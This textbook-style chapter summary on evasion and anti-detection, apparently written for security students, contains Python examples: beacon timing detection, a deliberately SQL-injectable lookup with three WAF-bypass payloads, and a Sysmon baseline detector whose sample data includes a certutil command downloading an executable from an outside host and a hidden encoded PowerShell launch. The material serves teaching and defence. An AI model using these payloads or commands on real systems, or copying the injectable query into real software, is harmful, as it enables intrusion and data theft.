Chapter 27 Key Takeaways: Evasion and Anti-Detection Techniques

Core Principles

  1. Evasion is a professional obligation, not a party trick. A penetration test that is detected in its first hour only confirms that the detections which fired are working; it says nothing about the far more dangerous case, an intrusion those detections miss. Evasion testing gives an organization a realistic measure of its posture against a skilled adversary rather than against a noisy one.

  2. Ethics frame everything. Every evasion technique must be authorized in writing, proportional to the engagement objectives, and fully documented in the final report. The value of evasion testing is in the disclosure and remediation, not in the secrecy.

  3. Detection is layered, so evasion must be layered. Modern security operates across multiple detection planes: signatures, heuristics, behavioral analysis, machine learning, kernel telemetry, network monitoring, and threat intelligence. Effective evasion must address the entire stack, not just one layer.

Technical Essentials

  1. Understand what you are evading. AV relies on static signatures, heuristics, and ML classifiers. EDR adds kernel-mode callbacks (process, thread, image-load and handle notifications registered through routines such as PsSetCreateProcessNotifyRoutine and ObRegisterCallbacks), user-mode hooks on ntdll exports, ETW telemetry (including the Microsoft-Windows-Threat-Intelligence provider), and AMSI scanning of script and .NET content at runtime. You cannot evade what you do not understand; map the detection architecture before choosing evasion techniques.

  2. Payload obfuscation defeats static analysis, not behavioral analysis. Encoding, encryption, and custom loaders stop signature matching on disk, but the payload must be decrypted and executed at some point, and its runtime behavior (memory allocation and injection, credential access, network connections) still generates telemetry. Both layers must be addressed: a cleanly obfuscated payload that calls VirtualAllocEx and CreateRemoteThread against another process is invisible to the scanner and obvious to the EDR.

  3. Living Off the Land is often the most effective evasion. Using only signed, legitimate system binaries (LOLBins) removes the easiest detection signal, an unknown or unsigned executable on disk; it does not remove the command-line, parent-process, and behavioral telemetry those binaries still produce. The LOLBAS project (Windows) and GTFOBins (Unix-like systems) catalog hundreds of abusable binaries.

  4. Network evasion requires understanding the inspection stack. Stateful firewalls inspect headers; IDS/IPS inspect payload content; NDR analyzes traffic behavior over time. DNS tunneling, protocol encapsulation, and encrypted channels each defeat a different inspection capability, and none defeats all of them. Traffic pattern analysis catches what content inspection misses: beacon detection works on connection timing and sizes, and JA3 fingerprints the TLS ClientHello, so neither cares that the channel is encrypted.

  5. WAFs are a compensating control, not a solution. WAF bypass techniques (encoding and decoding mismatches between the WAF and the application, equivalent syntax, case and whitespace variation, inline comments) demonstrate that the real fix is eliminating the underlying vulnerability; filtering malicious input at the perimeter only raises the cost of exploiting it.

  6. C2 framework selection is a strategic decision. Cobalt Strike offers maturity and features but is the most heavily signatured. Sliver and Mythic are open-source alternatives with, for now, lower detection profiles. Newer tools (Havoc, Brute Ratel) ship more advanced evasion but follow the same cycle: adoption drives signature coverage, and a framework's detection profile decays as it gains users.
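The timing analysis mentioned under item 4, as an added example rather than code from the chapter: it builds a constructed connection log (four host pairs, three beaconing implants with different sleep and jitter settings plus one human-like browser) and flags pairs whose inter-connection gaps are too regular. The record shape imitates the key fields of a Zeek conn.log; the hosts, addresses, thresholds and the make_beacon/make_browsing generators are all assumptions made for the example.

```python
"""Added example (not the chapter's code): periodicity analysis over
constructed connection records, the kind of check NDR tooling applies to
surface C2 beacons without ever looking inside the (encrypted) payload."""
import random
import statistics
from collections import defaultdict

# Constructed sample records with the shape (ts, src, dst, dport), imitating
# the key fields of a Zeek conn.log. Timestamps are in seconds.
def make_beacon(src, dst, interval, count, jitter=0.0, seed=1):
    """Implant check-ins every `interval` seconds, +/- `jitter` fraction."""
    rnd = random.Random(seed)
    t, out = 0.0, []
    for _ in range(count):
        out.append((t, src, dst, 443))
        t += interval * (1 + rnd.uniform(-jitter, jitter))
    return out

def make_browsing(src, dst, count, seed=2):
    """Human-like traffic: bursty gaps drawn from an exponential distribution."""
    rnd = random.Random(seed)
    t, out = 0.0, []
    for _ in range(count):
        out.append((t, src, dst, 443))
        t += rnd.expovariate(1 / 45)
    return out

CONN_LOG = (
    make_beacon("10.0.0.5", "203.0.113.10", 60, 40)                          # sleep 60, no jitter
    + make_beacon("10.0.0.7", "198.51.100.20", 300, 40, jitter=0.3, seed=3)  # sleep 300, 30% jitter
    + make_beacon("10.0.0.11", "203.0.113.40", 300, 40, jitter=0.9, seed=4)  # sleep 300, 90% jitter
    + make_browsing("10.0.0.9", "192.0.2.30", 40)
)

def score_pairs(records, min_conns=10):
    """Per (src, dst, dport) with at least min_conns connections, return
    (mean gap, coefficient of variation). A low CV means a regular cadence."""
    by_pair = defaultdict(list)
    for ts, src, dst, port in records:
        by_pair[(src, dst, port)].append(ts)
    scores = {}
    for pair, times in by_pair.items():
        if len(times) < min_conns:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.fmean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else float("inf")
        scores[pair] = (mean, cv)
    return scores

def find_beacons(records, max_cv=0.25, min_conns=10):
    """Flag pairs whose inter-connection gaps vary less than max_cv."""
    return {pair: s for pair, s in score_pairs(records, min_conns).items()
            if s[1] <= max_cv}

if __name__ == "__main__":
    for pair, (mean, cv) in sorted(score_pairs(CONN_LOG).items()):
        flag = "BEACON" if cv <= 0.25 else "      "
        print(f"{flag} {pair[0]:>10} -> {pair[1]:<14} mean gap {mean:7.1f}s  cv {cv:.2f}")
```

The 60-second and the 30%-jittered 300-second beacons are flagged; the browser is not, and neither is the 90%-jittered implant, whose gaps now vary as much as human traffic does. That last case is the evasion side of the same technique and the reason production NDR scores more than cadence: bytes per connection, connection count per day, and destination rarity are harder for an implant to randomize.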
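The point in item 5 worked through as an added example (not the chapter's code): a hypothetical signature-style WAF rule guards a SQL-injectable lookup against an in-memory SQLite database constructed for the example, three classic bypasses walk past the rule, and a parameterized version of the same query returns nothing for every one of them. The rule, the table contents and the payloads are all assumptions made for the example.

```python
"""Added example (not the chapter's code): a signature-style "WAF" rule in
front of a SQL-injectable lookup, three classic bypasses that slip past it,
and the parameterized query that removes the vulnerability instead."""
import re
import sqlite3
from urllib.parse import unquote

def build_db():
    """Constructed in-memory backend standing in for an application database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER, name TEXT, secret TEXT);
        INSERT INTO users VALUES (1, 'alice', 'alice-token');
        INSERT INTO users VALUES (2, 'bob', 'bob-token');
    """)
    return conn

# Hypothetical perimeter rule: block "UNION SELECT" separated by whitespace.
# It inspects the parameter as received on the wire, before URL decoding.
WAF_RULE = re.compile(r"union\s+select", re.IGNORECASE)

def waf_allows(raw_param: str) -> bool:
    return WAF_RULE.search(raw_param) is None

def vulnerable_lookup(conn, raw_param: str):
    # Deliberately vulnerable: the decoded value is concatenated into SQL.
    sql = f"SELECT name FROM users WHERE name = '{unquote(raw_param)}'"
    return [row[0] for row in conn.execute(sql)]

def safe_lookup(conn, raw_param: str):
    # Hardened: the value is bound as data and is never parsed as SQL.
    rows = conn.execute("SELECT name FROM users WHERE name = ?", (unquote(raw_param),))
    return [row[0] for row in rows]

def request(conn, raw_param: str) -> dict:
    """Push one request through the WAF and then through both backends."""
    if not waf_allows(raw_param):
        return {"waf": "blocked", "vulnerable": None, "safe": None}
    return {"waf": "allowed",
            "vulnerable": vulnerable_lookup(conn, raw_param),
            "safe": safe_lookup(conn, raw_param)}

BLOCKED = "x' UNION SELECT secret FROM users--"          # the textbook payload
BYPASSES = [
    "x' UNION/**/SELECT secret FROM users--",            # inline comment instead of whitespace
    "x' UNION ALL SELECT secret FROM users--",           # equivalent syntax the rule does not cover
    "x'%20UNION%20SELECT%20secret%20FROM%20users--",     # WAF sees %20, the application decodes it
]

if __name__ == "__main__":
    conn = build_db()
    for p in [BLOCKED, *BYPASSES]:
        print(f"{p!r:55} -> {request(conn, p)}")
```

Each bypass attacks a different assumption in the rule (what counts as whitespace, which syntax is "the" injection, which layer decodes the input), and a rule patched for all three is still a rule about syntax that the next variant will sidestep. The parameterized query is indifferent to all of them because the input never reaches the SQL parser.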

Defensive Takeaways

  1. Behavioral detection beats signature detection. The Volt Typhoon campaign showed that a disciplined adversary can operate almost entirely with built-in tools. Detection must focus on the actions performed (credential dumping, lateral movement, data staging) rather than on which tools perform them.

  2. Command-line logging is non-negotiable. Sysmon Event ID 1 (process creation) with full command-line and parent-process capture, or Windows Security Event ID 4688 with command-line auditing enabled, is the single most important data source for LOTL activity. Without it, certutil downloading a payload and certutil verifying a certificate store produce identical events.

  3. Baseline normal to detect abnormal. If you do not know what normal LOLBin usage looks like in your environment (which binaries, under which parents, with which arguments, by which accounts), you cannot detect abnormal usage. Build behavioral baselines for critical systems and accounts and alert on deviations from them.
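Defensive takeaways 2 and 3, and the LOLBin discussion under Technical Essentials item 3, worked through as one added example (not the chapter's code): a baseline of benign Sysmon Event ID 1 records is learned per binary, new events for watchlisted LOLBins are scored against it, and the same detection is run once with and once without the CommandLine field to show what command-line logging buys. All records are constructed for the example; they use Sysmon's field names but the hosts, paths, payload URL and the LOLBINS watchlist are assumptions.

```python
"""Added example (not the chapter's code): learn a per-binary baseline from
Sysmon Event ID 1 (process creation) records, then flag LOLBin executions
that deviate from it, with and without the CommandLine field available."""
import os

# A watchlist of LOLBAS-catalogued binaries held to the learned baseline.
LOLBINS = {"certutil.exe", "rundll32.exe", "mshta.exe", "regsvr32.exe",
           "wmic.exe", "powershell.exe", "bitsadmin.exe", "msiexec.exe"}

# Constructed records using Sysmon Event ID 1 field names. A real baseline
# window would be days of events from the hosts being protected.
BASELINE_EVENTS = [
    {"EventRecordID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "certutil.exe -verifystore My"},
    {"EventRecordID": 2, "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL desk.cpl"},
    {"EventRecordID": 3, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]

NEW_EVENTS = [
    {"EventRecordID": 101, "Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.10/a.txt C:\Users\Public\a.exe"},
    {"EventRecordID": 102, "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"rundll32.exe C:\Users\Public\x.dll,Start"},
    {"EventRecordID": 103, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
    {"EventRecordID": 104, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"EventRecordID": 105, "Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "certutil.exe -verifystore My"},
]

def _base(path):
    return os.path.basename(path.replace("\\", "/")).lower()

def _switches(cmdline):
    # Switch-like tokens only; file names and values are dropped so the
    # baseline generalizes over paths.
    return {t.lower() for t in cmdline.split()[1:] if t.startswith(("-", "/"))}

def build_baseline(events, use_cmdline=True):
    """Learn (image, parent) pairs and, when CommandLine is logged, the set
    of switches each image is normally run with."""
    pairs, switches = set(), {}
    for e in events:
        img, parent = _base(e["Image"]), _base(e["ParentImage"])
        pairs.add((img, parent))
        if use_cmdline:
            switches.setdefault(img, set()).update(_switches(e["CommandLine"]))
    return {"pairs": pairs, "switches": switches}

def detect(events, baseline, use_cmdline=True):
    """Return (EventRecordID, image, reasons) for watchlisted binaries that
    ran under an unseen parent or with switches never seen in the baseline."""
    alerts = []
    for e in events:
        img, parent = _base(e["Image"]), _base(e["ParentImage"])
        if img not in LOLBINS:
            continue
        reasons = []
        if (img, parent) not in baseline["pairs"]:
            reasons.append(f"unseen parent {parent}")
        if use_cmdline:
            new = _switches(e["CommandLine"]) - baseline["switches"].get(img, set())
            if new:
                reasons.append("new switches " + " ".join(sorted(new)))
        if reasons:
            alerts.append((e["EventRecordID"], img, reasons))
    return alerts

def alert_ids(use_cmdline=True):
    """Which constructed events fire, with and without command-line capture."""
    baseline = build_baseline(BASELINE_EVENTS, use_cmdline)
    return {rid for rid, _, _ in detect(NEW_EVENTS, baseline, use_cmdline)}

if __name__ == "__main__":
    print("with CommandLine:   ", sorted(alert_ids(True)))    # 101, 102, 104
    print("without CommandLine:", sorted(alert_ids(False)))   # 102, 104: the certutil download is missed
```

The Office-spawned rundll32 and PowerShell are caught either way because the parent is wrong for the baseline. The certutil download (event 101) is the one that matters for the logging point: its image, parent and user are identical to the benign certificate-store check in the baseline, so with the CommandLine field absent it is indistinguishable from normal administration and never fires.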

Career Applications

  • Red team operators: Master evasion to provide realistic assessments; always document and disclose
  • Blue team analysts: Study evasion to identify detection gaps and build better rules
  • SOC engineers: Focus on behavioral detection and anomaly analysis over signature matching
  • Security architects: Design defense-in-depth that addresses multiple evasion categories simultaneously
  • Compliance professionals: Ensure red team engagements include evasion testing to validate control effectiveness